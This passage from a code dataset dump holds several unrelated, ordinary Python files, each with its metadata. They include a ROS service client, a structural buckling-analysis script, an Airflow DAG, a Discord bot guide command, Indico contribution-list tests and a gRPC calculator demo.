self._make_blocking_call(self._request_handlers[key], pair_request_msg, timeout)\n else:\n request_handler = NonBlockingRequestHandler(key, callback, error_callback)\n self._request_handlers[key] = request_handler.copy()\n self._make_non_blocking_call(request_handler, pair_request_msg, timeout)\n return pair_request_msg.id\n\n ##########################################################################\n # Private Support Methods\n ##########################################################################\n\n def _make_blocking_call(self, request_handler, msg, timeout):\n '''\n @param request_handler : information and event handler for the request\n @type RequestHandler\n\n @param msg : the request pair message structure\n @type self.ServicePairRequest\n '''\n self._publisher.publish(msg)\n if timeout is None:\n request_handler.event.wait()\n else:\n request_handler.event.wait(timeout.to_sec())\n if request_handler.response is not None:\n response = request_handler.response\n else:\n response = None\n del 
self._request_handlers[request_handler.key]\n return response\n\n def _make_non_blocking_call(self, request_handler, msg, timeout):\n '''\n @param request_handler : a copy of information and event handler for the request (used for the timer)\n @type RequestHandler\n\n @param msg : the request pair message structure\n @type self.ServicePairRequest\n '''\n self._publisher.publish(msg)\n if timeout is not None:\n # bind the key so the timer callback knows which request to handle.\n delete_request_handler = functools.partial(self._timer_callback, request_handler=request_handler)\n request_handler.timer = rospy.Timer(timeout, delete_request_handler, oneshot=True)\n\n def _timer_callback(self, unused_event, request_handler):\n '''\n Handle a timeout for non-blocking requests. This will call the user's defined error callback function\n (with args: (uuid_msgs.UniqueID, str)).\n\n @param event : regular rospy timer event object (not used)\n\n @param request_handler : a copy of the handler that gets bound when this callback is passed into the timer\n @type NonBlockingRequestHandler\n\n @todo respond on the error callback.\n '''\n already_handled = False\n self._lock.acquire()\n try:\n del self._request_handlers[request_handler.key]\n except KeyError:\n already_handled = True\n self._lock.release()\n if not already_handled:\n if request_handler.error_callback is not None:\n request_handler.error_callback(unique_id.toMsg(uuid.UUID(request_handler.key)), \"timeout\")\n\n def _internal_callback(self, msg):\n '''\n @param msg : message returned from the server (with pair id etc)\n @type self.ServicePairResponse\n '''\n # Check if it is a blocking call that has requested it.\n key = unique_id.toHexString(msg.id)\n already_handled = False\n non_blocking_request_handler = None\n self._lock.acquire()\n try:\n request_handler = self._request_handlers[key]\n request_handler.response = msg.response\n if isinstance(request_handler, BlockingRequestHandler):\n request_handler.event.set()\n already_handled = True\n else: # NonBlocking\n # make a copy and delete so we can release the lock. 
Process after.\n non_blocking_request_handler = request_handler.copy()\n del self._request_handlers[key]\n except KeyError:\n already_handled = True # it's either a blocking, or a non-blocking call handled by the timeout\n self._lock.release()\n if not already_handled:\n # Could use EAFP approach here since they will almost never be None, but this is more readable\n if non_blocking_request_handler.callback is not None:\n request_handler.callback(msg.id, msg.response)\n", "sub_path": "rocon_python_comms/src/rocon_python_comms/service_pair_client.py", "file_name": "service_pair_client.py", "file_ext": "py", "file_size_in_byte": 10015, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "threading.Event", "line_number": 35, "usage_type": "call"}, {"api_name": "exceptions.ServicePairException", "line_number": 94, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 95, "usage_type": "call"}, {"api_name": "rospy.Subscriber", "line_number": 96, "usage_type": "call"}, {"api_name": "rospy.Publisher", "line_number": 97, "usage_type": "call"}, {"api_name": "time.time", "line_number": 110, "usage_type": "call"}, {"api_name": "rospy.is_shutdown", "line_number": 111, "usage_type": "call"}, {"api_name": "time.time", "line_number": 111, "usage_type": "call"}, {"api_name": "rospy.rostime.wallsleep", "line_number": 114, "usage_type": "call"}, {"api_name": "rospy.rostime", "line_number": 114, "usage_type": "attribute"}, {"api_name": "rospy.is_shutdown", "line_number": 115, "usage_type": "call"}, {"api_name": "rospy.ROSInterruptException", "line_number": 116, "usage_type": "call"}, {"api_name": "rospy.ROSException", "line_number": 118, "usage_type": "call"}, {"api_name": "unique_id.toMsg", "line_number": 142, "usage_type": "call"}, {"api_name": "unique_id.fromRandom", "line_number": 142, "usage_type": "call"}, {"api_name": "unique_id.toHexString", "line_number": 144, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 189, "usage_type": "call"}, {"api_name": "rospy.Timer", "line_number": 190, "usage_type": "call"}, {"api_name": "unique_id.toMsg", "line_number": 213, "usage_type": "call"}, {"api_name": "uuid.UUID", "line_number": 213, "usage_type": "call"}, {"api_name": "unique_id.toHexString", "line_number": 221, "usage_type": "call"}]}
+{"seq_id": "262773503", "text": "import math\nimport numpy as np\nfrom scipy import linalg\nfrom channel import channel\nfrom I_beam import I_beam\nfrom RHS import RHS\nfrom stress_from_strain import stress_from_strain\nfrom get_data import get_data\nimport time\nimport matplotlib.pyplot as plt\nimport pandas as pd \nfrom finite_strip_moment import finitestrip_shape\nimport os\nimport xlrd\nfrom xlutils.copy import copy\nfrom xlwt import Workbook\n\n#cd c:/Users/saulg/Documents/year\\ 4/IIB_Project/code/mycode\n\n\ndef find_nearest(array, value):\n array = np.asarray(array)\n idx = (np.abs(array - value)).argmin()\n return idx\n\nfactor = 5\n\nlist_M =[]\nlist_C =[]\nlist_stress = []\nlist_stress_c = []\nlist_Et= []\nlist_Et_c= []\nlist_type = []\n\nfor data_point in range(100,196):\n Material, Forming_process, Bending_type, Actual_Length, shape, Material_flat, Material_corner = get_data(data_point)\n if Bending_type == 4:\n \"\"\"print(Material)\n print(Forming_process)\n print(Bending_type)\n print(shape)\n print(Actual_Length)\n print(Material_flat)\n print(Material_corner)\"\"\"\n\n number = 100\n max_L = Actual_Length*5 \n min_L = shape[2]/5\n r = (max_L/min_L) ** (1/(number-1))\n Moment = []\n stress_list = []\n Moment_1 = []\n Curvature_1 = []\n Curvature = []\n Length = []\n Length_factor= True\n tic = time.perf_counter()\n\n for i in range(number):\n L = min_L * r**i\n Length.append(L)\n if i == 0:\n A_initial = 0.00001\n elif i == 1:\n A_initial = A\n A_2 = A\n elif i == 2:\n A_initial = abs(2 * A - A_2)\n A_3 = A_2\n A_2 = A\n else:\n A_initial = abs(3 * A - 3 * A_2 + A_3)\n A_3 = A_2\n A_2 = A\n\n M, A, max_stress = finitestrip_shape(L, shape, Material_flat, Material_corner, A_initial)\n C=A\n if M ==\"Fail\":\n Length.pop()\n break\n if Length_factor:\n Moment_1.append(M)\n Curvature_1.append(M)\n \n for num in range(2,round(factor*L/(shape[2]))):\n M_2 = Moment[find_nearest(Length, L/num)]\n C_2 = Curvature[find_nearest(Length, L/num)]\n if M > M_2:\n M = M_2\n max_stress = stress_list[find_nearest(Length, L/num)]\n if C > C_2:\n C = C_2\n \n Moment.append(M)#\n Curvature.append(C)\n stress_list.append(max_stress)\n toc = time.perf_counter()\n print(f\"Done in {toc - tic:0.4f} seconds\")\n typ = \"Flexural\"\n M, A, max_stress= finitestrip_shape(Actual_Length, shape, Material_flat, Material_corner, A_initial)\n C=A\n if Length_factor and M !=\"Fail\":\n for num in range(2,round(factor*Actual_Length/(shape[2]))):\n\n M_2 = Moment[find_nearest(Length, Actual_Length/num)]\n C_2 = Curvature[find_nearest(Length, Actual_Length/num)]\n if M_2 C_2:\n C = C_2\n print(data_point, Actual_Length,M,C, max_stress)\n list_M.append(M)\n list_C.append(C)\n list_stress.append(max_stress[0][0])\n list_stress_c.append(max_stress[1][0])\n list_Et.append(max_stress[0][1])\n list_Et_c.append(max_stress[1][1])\n list_type.append(typ)\n\n plt.semilogx([Actual_Length], [M],'rx')\n if Length_factor:\n plt.semilogx(Length, Moment_1, linewidth = 0.4, color = \"black\", label='Singe Half Wavelength')\n plt.semilogx(Length, Moment, linewidth = 1.2, color = \"black\", label='Multiple Half Wavelengths')\n else:\n plt.semilogx(Length, Moment, linewidth = 1.4, color = \"black\")\n\n #plt.semilogx([1000], [151], 'rx', label='Buckling')\n #plt.semilogx([1000], [169], 'bx', label='Failure')\n\n plt.xlabel('L / mm')\n plt.ylabel('Buckling Moment / KNm')\n plt.grid(True,'both')\n plt.title(data_point)\n plt.legend()\n #plt.show()\n else:\n list_M.append(\"\")\n list_C.append(\"\")\n list_stress.append(\"\")\n 
list_stress_c.append(\"\")\n list_Et.append(\"\")\n list_Et_c.append(\"\")\n list_type.append(\"\")\nprint(\"M\")\nfor n in list_M:\n print(n)\nprint(\"list_C\")\nfor n in list_C:\n print(n)\nprint(\"list_stress\")\nfor n in list_stress:\n print(n)\nprint(\"list_stress_c\")\nfor n in list_stress_c:\n print(n)\nprint(\"list_Et\")\nfor n in list_Et:\n print(n)\nprint(\"list_Et_c\")\nfor n in list_Et_c:\n print(n)\nprint(\"type\")\nfor n in list_type:\n print(n)\n\n\n\n\n\n\n\"\"\"\nprint(finitestrip_shape(L = 1000, shape = \"channel\", b = 138.60, d = 202.05, r = 5, t_flange = 6.11, t_web = 6.01, c = 23, Eel = 195000, spr = 520, n = 7.5, v = 0.3, k = -0.46))\n\nx1=[]\ny1=[]\n\nfor f in file:\n x1.append(f[0])\n y1.append(f[1])\nplt.semilogx(x1, y1, linewidth = 0.4, color = \"red\", label='CUFSM')\"\"\"", "sub_path": "finite_strip_moment_curve.py", "file_name": "finite_strip_moment_curve.py", "file_ext": "py", "file_size_in_byte": 5595, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "numpy.asarray", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 23, "usage_type": "call"}, {"api_name": "get_data.get_data", "line_number": 37, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 58, "usage_type": "call"}, {"api_name": "finite_strip_moment.finitestrip_shape", "line_number": 77, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 98, "usage_type": "call"}, {"api_name": "finite_strip_moment.finitestrip_shape", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.semilogx", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.semilogx", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.semilogx", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.semilogx", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}]}
+{"seq_id": "636819995", "text": "from datetime import datetime\n\nimport pendulum\nfrom airflow import DAG\nfrom airflow.operators.bash_operator import BashOperator\n\ndefault_args = {\n 'owner': 'hungvv1',\n 'email': ['vuviethung.98.hust@gmail.com'],\n 'email_on_failure': True,\n 'email_on_retry': True\n}\n\ndag = DAG('project_analytics_monthly',\n default_args=default_args,\n description='Các jobs chạy phân tích dự án theo tháng',\n schedule_interval='@once',\n start_date=datetime(2018, 1, 1, tzinfo=pendulum.timezone('Asia/Ho_Chi_Minh')),\n catchup=False\n )\n\nt1 = BashOperator(\n task_id=\"project_statistics_monthly\",\n bash_command='/home/vuviethung/code/code/cen_jobs/project_statistics_monthly/run-project-filtering.sh',\n dag=dag,\n queue='worker_2'\n)\n", "sub_path": "dags/g_filtering_project_dags.py", "file_name": "g_filtering_project_dags.py", "file_ext": "py", "file_size_in_byte": 804, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "airflow.DAG", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 18, "usage_type": "call"}, {"api_name": "pendulum.timezone", "line_number": 18, "usage_type": "call"}, {"api_name": "airflow.operators.bash_operator.BashOperator", "line_number": 22, "usage_type": "call"}]}
+{"seq_id": "346370443", "text": "import discord \r\nimport asyncio\r\nimport random\r\nfrom discord.ext import commands\r\nimport os\r\nimport datetime\r\nimport pymongo\r\nimport json\r\nimport math\r\nm=None\r\ndb_client=pymongo.MongoClient(os.getenv(\"DB_URL\"))\r\ndb1_client=pymongo.MongoClient(os.getenv(\"DB2_URL\"))\r\n\r\nclass guide(commands.Cog):\r\n def __init__(self,bot):\r\n self.bot=bot\r\n @commands.command()\r\n @commands.guild_only()\r\n async def guide(self,ctx,number=None):\r\n if number==None:\r\n number=1\r\n number=int(number)-1\r\n #registration\r\n list_of_pages=[]\r\n embed=discord.Embed(title=\"Guide\",description=\"**Registration**\\n\\nIn order to use some features of the bot or challenge others, you need to have an account on your name. You can create an account by using `c!register` command.\\nAfter creating an account you can check your profile using `c!profile` command.\")\r\n embed.set_image(url=\"https://raw.githubusercontent.com/Shrikar-Kota/Personalcrickgame/master/images/register-pic.png\")\r\n embed.set_footer(text=\"Page : 1/8\")\r\n list_of_pages.append(embed)\r\n #challenge\r\n embed=discord.Embed(title=\"Guide\",description=\"**Challenge**\\n\\nAfter you are done with creating your account you can now use all the bot's commands and play with it.\\nTo play with the other person, either you need to challenge them or they need to challenge you which you can do by using `c!challenge` command tagging the opponent.\\nAfter you throw a challenge, the opponent can accept it using `c!accept` or decline it using `c!decline` command.\")\r\n embed.set_footer(text=\"Page : 2/8\")\r\n embed.set_image(url=\"https://raw.githubusercontent.com/Shrikar-Kota/Personalcrickgame/master/images/Challenge-pic.png\")\r\n list_of_pages.append(embed)\r\n #select_team\r\n embed=discord.Embed(title=\"Guide\",description=\"**Selecting team**\\n\\nAfter the opponent accepts the challenge, the bot will prompt you to select a team from default teams.\\nYou can check the available leagues by typing `c!leagues`. After checking the available leagues, you can select a league from it by using `c!st league_id`, here league id is the id given by the respective league.\\nAfter selecting the league, the bot will prompt you to select a team which you can do by using `c!select_team `.\")\r\n embed.set_footer(text=\"Page : 3/8\")\r\n embed.set_image(url=\"https://raw.githubusercontent.com/Shrikar-Kota/Personalcrickgame/master/images/select-team-pic.png\")\r\n list_of_pages.append(embed)\r\n #set_overs\r\n embed=discord.Embed(title=\"Guide\",description=\"**Setting overs**\\n\\nAfter you are done with choosing your team, you need to set the overs of the match. This can be done using `c!so` command.\")\r\n embed.set_footer(text=\"Page : 4/8\")\r\n embed.set_image(url=\"https://raw.githubusercontent.com/Shrikar-Kota/Personalcrickgame/master/images/set-overs-pic.png\")\r\n list_of_pages.append(embed)\r\n #toss\r\n embed=discord.Embed(title=\"Guide\",description=\"**Toss**\\n\\nSimilar to the real life cricket game, the teams have to choose what they gonna do first. This can be done by doing toss. 
Toss can be done using `c!toss` command.\\nAfter one of the players types the command, the opponent needs to send his choice in the chat i.e., heads/tails.\")\r\n embed.set_footer(text=\"Page : 5/8\")\r\n embed.set_image(url=\"https://raw.githubusercontent.com/Shrikar-Kota/Personalcrickgame/master/images/toss-pic.png\")\r\n list_of_pages.append(embed)\r\n #choose\r\n embed=discord.Embed(title=\"Guide\",description=\"**Choosing**\\n\\nAfter the toss, the toss-winner should choose either bowling or batting by using `c!choose` command.\")\r\n embed.set_footer(text=\"Page : 6/8\")\r\n embed.set_image(url=\"https://raw.githubusercontent.com/Shrikar-Kota/Personalcrickgame/master/images/choose-pic.png\")\r\n list_of_pages.append(embed)\r\n #select_player\r\n embed=discord.Embed(title=\"Guide\",description=\"**Selecting players**\\n\\nAfter choosing either batting or bowling, the teams can choose their players by using `c!sp` command.\")\r\n embed.set_footer(text=\"Page : 7/8\")\r\n embed.set_image(url=\"https://raw.githubusercontent.com/Shrikar-Kota/Personalcrickgame/master/images/select-player-pic.png\")\r\n list_of_pages.append(embed)\r\n #bowl\r\n embed=discord.Embed(title=\"Guide\",description=\"**Bowling**\\n\\nAfter choosing your players, now you are all set to play the match. The bowling team needs to use the `c!bowl` command and the batting team needs to wait patiently for their turn to come :wink:.\")\r\n embed.set_footer(text=\"Page : 8/8\")\r\n embed.set_image(url=\"https://raw.githubusercontent.com/Shrikar-Kota/Personalcrickgame/master/images/bowl-pic.png\")\r\n list_of_pages.append(embed) \r\n global m\r\n m=await ctx.send(embed=list_of_pages[number])\r\n await m.add_reaction(\"⬅️\")\r\n await m.add_reaction(\"➡️\")\t\r\n def check(reaction, user):\r\n return (user.id==ctx.message.author.id and m.id==reaction.message.id)\r\n while 1:\r\n try:\r\n reaction, user = await self.bot.wait_for('reaction_add', timeout=30.0, check=check)\r\n except asyncio.TimeoutError:\r\n return \r\n else:\r\n m = await ctx.channel.fetch_message(m.id)\r\n if str(reaction.emoji)==\"➡️\":\r\n e=m.embeds\r\n e=str(e[0].footer.text)\r\n e=e.split(\":\")\r\n e=e[1].split(\"/\")\r\n count=int(e[0])\r\n if count>len(list_of_pages)-1:\r\n count=0\r\n await m.edit(embed=list_of_pages[count])\r\n await m.remove_reaction(\"➡️\",user)\r\n elif str(reaction.emoji)==\"⬅️\":\r\n e=m.embeds\r\n e=str(e[0].footer.text)\r\n e=e.split(\":\")\r\n e=e[1].split(\"/\")\r\n count=int(e[0])-2\r\n if count==-1:\r\n count=len(list_of_pages)-1\r\n await m.edit(embed=list_of_pages[count])\r\n await m.remove_reaction(\"⬅️\",user)\r\n else:\r\n await m.remove_reaction(str(reaction.emoji),user)\r\n\r\n\r\ndef setup(bot):\r\n\tbot.add_cog(guide(bot))\r\n", "sub_path": "cogs/guide.py", "file_name": "guide.py", "file_ext": "py", "file_size_in_byte": 6492, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pymongo.MongoClient", "line_number": 11, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 11, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 12, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 12, "usage_type": "call"}, {"api_name": "discord.ext.commands.Cog", "line_number": 14, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 14, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 25, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 30, 
"usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 35, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 40, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 45, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 50, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 55, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 60, "usage_type": "call"}, {"api_name": "asyncio.TimeoutError", "line_number": 73, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.command", "line_number": 17, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 17, "usage_type": "name"}, {"api_name": "discord.ext.commands.guild_only", "line_number": 18, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 18, "usage_type": "name"}]}
+{"seq_id": "401691712", "text": "import contextlib\nfrom functools import wraps\n\n\nclass cached_property(object):\n \"\"\"\n Property which caches the result of the given `getter`.\n\n :param doc: Optional docstring which is used instead of the `getter`\\s\n docstring.\n \"\"\"\n def __init__(self, getter, doc=None):\n self.getter = getter\n self.__module__ = getter.__module__\n self.__name__ = getter.__name__\n self.__doc__ = doc or getter.__doc__\n\n def __get__(self, obj, type=None):\n if type is None:\n return self\n value = obj.__dict__[self.__name__] = self.getter(obj)\n return value\n\n\ndef service(func):\n func.__transactional__ = True\n return func\n\n\ndef _transactional(session_provider):\n def wrap_function(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n session = session_provider()\n try:\n ret = func(*args, **kwargs)\n session.commit()\n return ret\n except:\n session.rollback()\n raise\n return wrapper\n return wrap_function\n\n\ndef transactional(instance, session_provider):\n for key in dir(instance):\n func = getattr(instance, key)\n\n if callable(func) and getattr(func, '__transactional__', False):\n setattr(instance, key, wraps(func)(_transactional(session_provider)(func)))\n return instance", "sub_path": "tomasd/src/rsmt/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 1415, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "functools.wraps", "line_number": 32, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 51, "usage_type": "call"}]}
+{"seq_id": "130933153", "text": "# This file is part of Indico.\n# Copyright (C) 2002 - 2023 CERN\n#\n# Indico is free software; you can redistribute it and/or\n# modify it under the terms of the MIT License; see the\n# LICENSE file for more details.\n\nimport pytest\n\nfrom indico.modules.events.contributions.lists import ContributionListGenerator\nfrom indico.modules.events.contributions.models.persons import AuthorType, ContributionPersonLink\nfrom indico.modules.events.models.persons import EventPerson\nfrom indico.modules.events.registration.models.forms import RegistrationForm\nfrom indico.modules.events.registration.models.registrations import Registration, RegistrationState\n\n\n@pytest.fixture\ndef create_registration(dummy_event):\n \"\"\"Return a callable that lets you create a contribution.\"\"\"\n\n def _create_registration(user, regform, **kwargs):\n return Registration(\n first_name='Guinea',\n last_name='Pig',\n checked_in=True,\n state=RegistrationState.complete,\n currency='USD',\n email=user.email,\n user=user,\n registration_form=regform,\n **kwargs\n )\n\n return _create_registration\n\n\ndef test_filter_contrib_entries(app, db, dummy_event, create_user, create_contribution, create_registration):\n registered_user = create_user(1)\n registered_speaker = create_user(2)\n unregistered_user = create_user(3)\n dummy_regform = RegistrationForm(event=dummy_event, title='Registration Form', currency='USD')\n dummy_event.registrations.append(create_registration(registered_user, dummy_regform))\n dummy_event.registrations.append(create_registration(registered_speaker, dummy_regform))\n registered_speaker_contribution = create_contribution(dummy_event, 'Registered Speaker', person_links=[\n ContributionPersonLink(person=EventPerson.create_from_user(registered_speaker, dummy_event),\n is_speaker=True)\n ])\n registered_speaker_author_contribution = create_contribution(\n dummy_event, 'Registered Speaker Author', person_links=[\n ContributionPersonLink(person=EventPerson.for_user(registered_speaker, dummy_event),\n is_speaker=True, author_type=AuthorType.primary)\n ])\n unregistered_speaker_registered_author_contribution = create_contribution(\n dummy_event, 'Unregistered Speaker, Registered Author', person_links=[\n ContributionPersonLink(person=EventPerson.for_user(unregistered_user, dummy_event),\n is_speaker=True),\n ContributionPersonLink(person=EventPerson.for_user(registered_user, dummy_event),\n author_type=AuthorType.primary)\n ])\n registered_speaker_unregistered_author_contribution = create_contribution(\n dummy_event, 'Registered Speaker, Unregistered Author', person_links=[\n ContributionPersonLink(person=EventPerson.for_user(registered_user, dummy_event), is_speaker=True),\n ContributionPersonLink(person=EventPerson.for_user(unregistered_user, dummy_event),\n author_type=AuthorType.primary)\n ])\n # Filter contributions with registered users\n with app.test_request_context():\n list_gen = ContributionListGenerator(dummy_event)\n list_gen.list_config['filters'] = {'items': {'people': {'registered'}}}\n result = list_gen.get_list_kwargs()\n assert result['contribs'] == [\n registered_speaker_contribution,\n registered_speaker_author_contribution,\n unregistered_speaker_registered_author_contribution,\n registered_speaker_unregistered_author_contribution\n ]\n\n # Filter contributions with registered speakers\n list_gen.list_config['filters'] = {'items': {'speakers': {'registered'}}}\n with app.test_request_context():\n result = list_gen.get_list_kwargs()\n assert 
result['contribs'] == [\n registered_speaker_contribution,\n registered_speaker_author_contribution,\n registered_speaker_unregistered_author_contribution\n ]\n\n # Filter contributions with unregistered speakers and registered users\n list_gen.list_config['filters'] = {'items': {'speakers': {'not_registered'}, 'people': {'registered'}}}\n with app.test_request_context():\n result = list_gen.get_list_kwargs()\n assert result['contribs'] == [\n unregistered_speaker_registered_author_contribution\n ]\n", "sub_path": "indico/modules/events/contributions/lists_test.py", "file_name": "lists_test.py", "file_ext": "py", "file_size_in_byte": 4479, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "indico.modules.events.registration.models.registrations.Registration", "line_number": 22, "usage_type": "call"}, {"api_name": "indico.modules.events.registration.models.registrations.RegistrationState.complete", "line_number": 26, "usage_type": "attribute"}, {"api_name": "indico.modules.events.registration.models.registrations.RegistrationState", "line_number": 26, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 17, "usage_type": "attribute"}, {"api_name": "indico.modules.events.registration.models.forms.RegistrationForm", "line_number": 41, "usage_type": "call"}, {"api_name": "indico.modules.events.contributions.models.persons.ContributionPersonLink", "line_number": 45, "usage_type": "call"}, {"api_name": "indico.modules.events.models.persons.EventPerson.create_from_user", "line_number": 45, "usage_type": "call"}, {"api_name": "indico.modules.events.models.persons.EventPerson", "line_number": 45, "usage_type": "name"}, {"api_name": "indico.modules.events.contributions.models.persons.ContributionPersonLink", "line_number": 50, "usage_type": "call"}, {"api_name": "indico.modules.events.models.persons.EventPerson.for_user", "line_number": 50, "usage_type": "call"}, {"api_name": "indico.modules.events.models.persons.EventPerson", "line_number": 50, "usage_type": "name"}, {"api_name": "indico.modules.events.contributions.models.persons.AuthorType.primary", "line_number": 51, "usage_type": "attribute"}, {"api_name": "indico.modules.events.contributions.models.persons.AuthorType", "line_number": 51, "usage_type": "name"}, {"api_name": "indico.modules.events.contributions.models.persons.ContributionPersonLink", "line_number": 55, "usage_type": "call"}, {"api_name": "indico.modules.events.models.persons.EventPerson.for_user", "line_number": 55, "usage_type": "call"}, {"api_name": "indico.modules.events.models.persons.EventPerson", "line_number": 55, "usage_type": "name"}, {"api_name": "indico.modules.events.contributions.models.persons.ContributionPersonLink", "line_number": 57, "usage_type": "call"}, {"api_name": "indico.modules.events.models.persons.EventPerson.for_user", "line_number": 57, "usage_type": "call"}, {"api_name": "indico.modules.events.models.persons.EventPerson", "line_number": 57, "usage_type": "name"}, {"api_name": "indico.modules.events.contributions.models.persons.AuthorType.primary", "line_number": 58, "usage_type": "attribute"}, {"api_name": "indico.modules.events.contributions.models.persons.AuthorType", "line_number": 58, "usage_type": "name"}, {"api_name": "indico.modules.events.contributions.models.persons.ContributionPersonLink", "line_number": 62, "usage_type": "call"}, {"api_name": "indico.modules.events.models.persons.EventPerson.for_user", "line_number": 62, "usage_type": "call"}, 
{"api_name": "indico.modules.events.models.persons.EventPerson", "line_number": 62, "usage_type": "name"}, {"api_name": "indico.modules.events.contributions.models.persons.ContributionPersonLink", "line_number": 63, "usage_type": "call"}, {"api_name": "indico.modules.events.models.persons.EventPerson.for_user", "line_number": 63, "usage_type": "call"}, {"api_name": "indico.modules.events.models.persons.EventPerson", "line_number": 63, "usage_type": "name"}, {"api_name": "indico.modules.events.contributions.models.persons.AuthorType.primary", "line_number": 64, "usage_type": "attribute"}, {"api_name": "indico.modules.events.contributions.models.persons.AuthorType", "line_number": 64, "usage_type": "name"}, {"api_name": "indico.modules.events.contributions.lists.ContributionListGenerator", "line_number": 68, "usage_type": "call"}]}
+{"seq_id": "1356193", "text": "'''\r\nCreated on 2017年12月28日\r\n\r\n@author: Administrator\r\n'''\r\n\r\nimport os\r\nimport grpc\r\nimport sys\r\nimport getopt\r\nimport time\r\nfrom concurrent import futures\r\nimport cProfile\r\n\r\nroot_path = os.path.dirname(__file__)\r\nsys.path.append('./')\r\nsys.path.append('../')\r\nsys.path.append('../proto')\r\n\r\nimport chat_pb2\r\nimport chat_pb2_grpc\r\n\r\nimport route_database_pb2\r\nimport route_database_pb2_grpc\r\n\r\nimport route_db\r\n\r\n_ONE_DAY_IN_SECONDS = 60 * 1\r\n\r\nclass Calc(chat_pb2_grpc.CalcServicer):\r\n def add(self, request, context):\r\n return chat_pb2.Result(c = request.a + request.b);\r\n \r\n def sub(self, request, context):\r\n return chat_pb2.Result(c = request.a - request.b);\r\n \r\n def mul(self, request, context):\r\n return chat_pb2.Result(c = request.a * request.b);\r\n\r\nclass Greeter(chat_pb2_grpc.GreeterServicer):\r\n\r\n def SayHello(self, request, context):\r\n return chat_pb2.HelloReply(message='Hello, %s!' % request.name)\r\n \r\n\r\nclass Route(route_database_pb2_grpc.RouteGreeterServicer):\r\n \r\n def __init__(self):\r\n # db = cProfile.run('route_db.read_route_database()')\r\n self.db = route_db.read_route_database()\r\n print(self.db)\r\n \r\n def GetFeature(self, request, context):\r\n for feature in self.db:\r\n if feature.location == request:\r\n return feature\r\n return None\r\n \r\n def ListFeatures(self, request, context):\r\n pass\r\n \r\n def RecordRoute(self, request, context):\r\n pass\r\n \r\n def RouteChat(self, request, context):\r\n pass\r\n \r\n \r\ndef client():\r\n channel = grpc.insecure_channel('localhost:50052')\r\n stub = chat_pb2_grpc.GreeterStub(channel)\r\n# routestub = route_database_pb2_grpc.RouteGreeterStub(channel)\r\n calcstub = chat_pb2_grpc.CalcStub(channel)\r\n tm1 = time.time()\r\n \r\n# for i in range(3000):\r\n# t = time.time()\r\n# reponse = stub.SayHello(chat_pb2.HelloRequest(name='liwei'))\r\n# print(i, ' >>>>>>>>', reponse, time.time() - t)\r\n \r\n# for _ in range(3000):\r\n# t = time.time()\r\n# reponse = routestub.GetFeature(route_database_pb2.FeatureRequest(route_database_pb2.Point(latitude=408122808, longitude=743999179)))\r\n# print(i, ' >>>>>>>>', reponse, time.time() - t)\r\n \r\n for i in range(3000):\r\n# t = time.time()\r\n reponse = calcstub.add(chat_pb2.Value(a=10, b=20))\r\n# print(i, ' >>>>>>>>', reponse, time.time() - t)\r\n \r\n# t = time.time()\r\n# reponse = calcstub.sub(chat_pb2.Value(a=10, b=20))\r\n# print(i, ' >>>>>>>>', reponse, time.time() - t)\r\n# \r\n# t = time.time()\r\n# reponse = calcstub.mul(chat_pb2.Value(a=10, b=20))\r\n# 